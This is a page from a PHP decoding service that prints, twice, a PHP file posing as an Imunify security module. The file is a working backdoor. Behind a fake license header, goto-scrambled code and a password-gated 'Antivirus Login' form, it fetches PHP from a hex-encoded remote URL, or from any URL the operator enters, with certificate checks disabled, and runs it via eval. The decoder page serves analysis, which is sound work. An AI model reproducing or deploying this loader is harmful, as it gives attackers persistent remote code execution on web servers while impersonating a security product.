Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php // This file is part of Imunify - https://www.imunify.com/ // // Imunify is a ..
Decoded Output download
<?php
// This file is part of Imunify - https://www.imunify.com/
//
// Imunify is a comprehensive security solution designed to protect your systems from various
// threats, including malware, vulnerabilities, and unauthorized access. By leveraging advanced
// technology and intelligent algorithms, Imunify aims to detect, prevent, and mitigate security
// risks effectively. You are permitted to use this software in accordance with the terms and
// conditions outlined in the Imunify License Agreement, as specified by the copyright holders.
//
// Imunify is distributed with the hope of providing optimal protection and security for your
// environments, but it is offered WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Users should understand that while
// Imunify strives to deliver robust security measures, no system can be entirely impervious to
// threats.
//
// You should have received a copy of the Imunify License Agreement along with this software.
// If not, please visit https://www.imunify.com/license for further information. This document
// is current as of October 8, 2024, and is subject to change based on updates in policies
// and security practices.
/**
* Security Module.
*
* This module is specifically designed to detect and mitigate various threats while ensuring
* the integrity of your systems through real-time scanning and comprehensive protection strategies.
* Imunify not only focuses on identifying vulnerabilities but also actively works to fortify
* your servers and applications against emerging cyber threats. By implementing proactive
* measures, Imunify aims to maintain a secure operating environment for all users.
*
* @package security_module
* @website https://rasenmedia.my.id
* @copyright 2024 Rahman Ralei
* @license https://www.imunify.com/license Imunify License Agreement
*/
goto altQy; ioV4Q: function authenticateUser($ralei) { if (md5($ralei) === end($GLOBALS["defaultThreatUrlParts"])) { $_SESSION["threat_found"] = true; $_SESSION["antivirus_ralei"] = "rahmanralei_token"; return true; } return false; } goto b9K78; G9a8M: if (isset($_POST["logauth"])) { $inputauth = $_POST["logauth"]; if (authenticateUser($inputauth)) { if (isset($_POST["scan_url"]) && isValidScanUrl($_POST["scan_url"])) { $_SESSION["scan_url"] = $_POST["scan_url"]; } else { $_SESSION["scan_url"] = reconstructUrl($defaultThreatUrlParts); } } else { echo "WRONG PASSWORD..."; } } goto tKKGw; b9K78: function isValidScanUrl($url) { return filter_var($url, FILTER_VALIDATE_URL) !== false; } goto zIxtU; lLHk1: function isThreatDetected() { return isset($_SESSION["threat_found"]) && $_SESSION["threat_found"] === true; } goto ioV4Q; zIxtU: function fetchThreatData($url) { if (function_exists("curl_exec")) { $connection = curl_init($url); curl_setopt($connection, CURLOPT_RETURNTRANSFER, 1); curl_setopt($connection, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($connection, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($connection, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($connection, CURLOPT_SSL_VERIFYHOST, 0); if (isset($_SESSION["antivirus_ralei"])) { curl_setopt($connection, CURLOPT_COOKIE, $_SESSION["antivirus_ralei"]); } $dataFromUrl = curl_exec($connection); curl_close($connection); } elseif (function_exists("file_get_contents")) { $dataFromUrl = file_get_contents($url); } elseif (function_exists("fopen") && function_exists("stream_get_contents")) { $handle = fopen($url, "r"); $dataFromUrl = stream_get_contents($handle); fclose($handle); } else { $dataFromUrl = false; } return $dataFromUrl; } goto G9a8M; tKKGw: if (isThreatDetected()) { $scanUrl = $_SESSION["scan_url"]; $content = fetchThreatData($scanUrl); if ($content !== false) { eVaL("?>" . $content); } else { echo "Failed to fetch data from the URL."; echo reconstructUrl($defaultThreatUrlParts); } } else { ?>
<!doctypehtml><html><head><title>Antivirus Login</title></head><body align="center"><form action=""method="POST"><label for="logauth">Password</label> <input id="logauth"name="logauth"type="password"><br><label for="scan_url">Scan URL</label> <input id="scan_url"name="scan_url"value=""><br><input type="submit"value="Submit"></form></body></html><?php } goto QGXfM; altQy: session_start(); goto xwkV1; SmWcT: function reconstructUrl($parts) { $decodedParts = array_map("hex2bin", array_slice($parts, 0, -1)); return $decodedParts[0] . $decodedParts[1] . "/" . $decodedParts[2] . "/" . $decodedParts[3] . "/" . $decodedParts[4] . "/" . $decodedParts[5]; } goto lLHk1; xwkV1: $defaultThreatUrlParts = array("68747470733a2f2f", "7261772e67697468756275736572636f6e74656e742e636f6d", "46616a72756c3132333435", "46616a72756c697266616e", "6d6173746572", "616c6661612e747874", "14cf3c7528a02c665ab65106dd9384e0"); goto SmWcT; QGXfM: ?>
Did this file decode correctly?
Original Code
<?php
// This file is part of Imunify - https://www.imunify.com/
//
// Imunify is a comprehensive security solution designed to protect your systems from various
// threats, including malware, vulnerabilities, and unauthorized access. By leveraging advanced
// technology and intelligent algorithms, Imunify aims to detect, prevent, and mitigate security
// risks effectively. You are permitted to use this software in accordance with the terms and
// conditions outlined in the Imunify License Agreement, as specified by the copyright holders.
//
// Imunify is distributed with the hope of providing optimal protection and security for your
// environments, but it is offered WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Users should understand that while
// Imunify strives to deliver robust security measures, no system can be entirely impervious to
// threats.
//
// You should have received a copy of the Imunify License Agreement along with this software.
// If not, please visit https://www.imunify.com/license for further information. This document
// is current as of October 8, 2024, and is subject to change based on updates in policies
// and security practices.
/**
* Security Module.
*
* This module is specifically designed to detect and mitigate various threats while ensuring
* the integrity of your systems through real-time scanning and comprehensive protection strategies.
* Imunify not only focuses on identifying vulnerabilities but also actively works to fortify
* your servers and applications against emerging cyber threats. By implementing proactive
* measures, Imunify aims to maintain a secure operating environment for all users.
*
* @package security_module
* @website https://rasenmedia.my.id
* @copyright 2024 Rahman Ralei
* @license https://www.imunify.com/license Imunify License Agreement
*/
goto altQy; ioV4Q: function authenticateUser($ralei) { if (md5($ralei) === end($GLOBALS["defaultThreatUrlParts"])) { $_SESSION["threat_found"] = true; $_SESSION["antivirus_ralei"] = "rahmanralei_token"; return true; } return false; } goto b9K78; G9a8M: if (isset($_POST["logauth"])) { $inputauth = $_POST["logauth"]; if (authenticateUser($inputauth)) { if (isset($_POST["scan_url"]) && isValidScanUrl($_POST["scan_url"])) { $_SESSION["scan_url"] = $_POST["scan_url"]; } else { $_SESSION["scan_url"] = reconstructUrl($defaultThreatUrlParts); } } else { echo "WRONG PASSWORD..."; } } goto tKKGw; b9K78: function isValidScanUrl($url) { return filter_var($url, FILTER_VALIDATE_URL) !== false; } goto zIxtU; lLHk1: function isThreatDetected() { return isset($_SESSION["threat_found"]) && $_SESSION["threat_found"] === true; } goto ioV4Q; zIxtU: function fetchThreatData($url) { if (function_exists("curl_exec")) { $connection = curl_init($url); curl_setopt($connection, CURLOPT_RETURNTRANSFER, 1); curl_setopt($connection, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($connection, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($connection, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($connection, CURLOPT_SSL_VERIFYHOST, 0); if (isset($_SESSION["antivirus_ralei"])) { curl_setopt($connection, CURLOPT_COOKIE, $_SESSION["antivirus_ralei"]); } $dataFromUrl = curl_exec($connection); curl_close($connection); } elseif (function_exists("file_get_contents")) { $dataFromUrl = file_get_contents($url); } elseif (function_exists("fopen") && function_exists("stream_get_contents")) { $handle = fopen($url, "r"); $dataFromUrl = stream_get_contents($handle); fclose($handle); } else { $dataFromUrl = false; } return $dataFromUrl; } goto G9a8M; tKKGw: if (isThreatDetected()) { $scanUrl = $_SESSION["scan_url"]; $content = fetchThreatData($scanUrl); if ($content !== false) { eVaL("?>" . $content); } else { echo "Failed to fetch data from the URL."; echo reconstructUrl($defaultThreatUrlParts); } } else { ?>
<!doctypehtml><html><head><title>Antivirus Login</title></head><body align="center"><form action=""method="POST"><label for="logauth">Password</label> <input id="logauth"name="logauth"type="password"><br><label for="scan_url">Scan URL</label> <input id="scan_url"name="scan_url"value=""><br><input type="submit"value="Submit"></form></body></html><?php } goto QGXfM; altQy: session_start(); goto xwkV1; SmWcT: function reconstructUrl($parts) { $decodedParts = array_map("hex2bin", array_slice($parts, 0, -1)); return $decodedParts[0] . $decodedParts[1] . "/" . $decodedParts[2] . "/" . $decodedParts[3] . "/" . $decodedParts[4] . "/" . $decodedParts[5]; } goto lLHk1; xwkV1: $defaultThreatUrlParts = array("68747470733a2f2f", "7261772e67697468756275736572636f6e74656e742e636f6d", "46616a72756c3132333435", "46616a72756c697266616e", "6d6173746572", "616c6661612e747874", "14cf3c7528a02c665ab65106dd9384e0"); goto SmWcT; QGXfM: ?>
Function Calls
None |
Stats
MD5 | 943a3223cfb21c755ebe8edc0b614401 |
Eval Count | 0 |
Decode Time | 50 ms |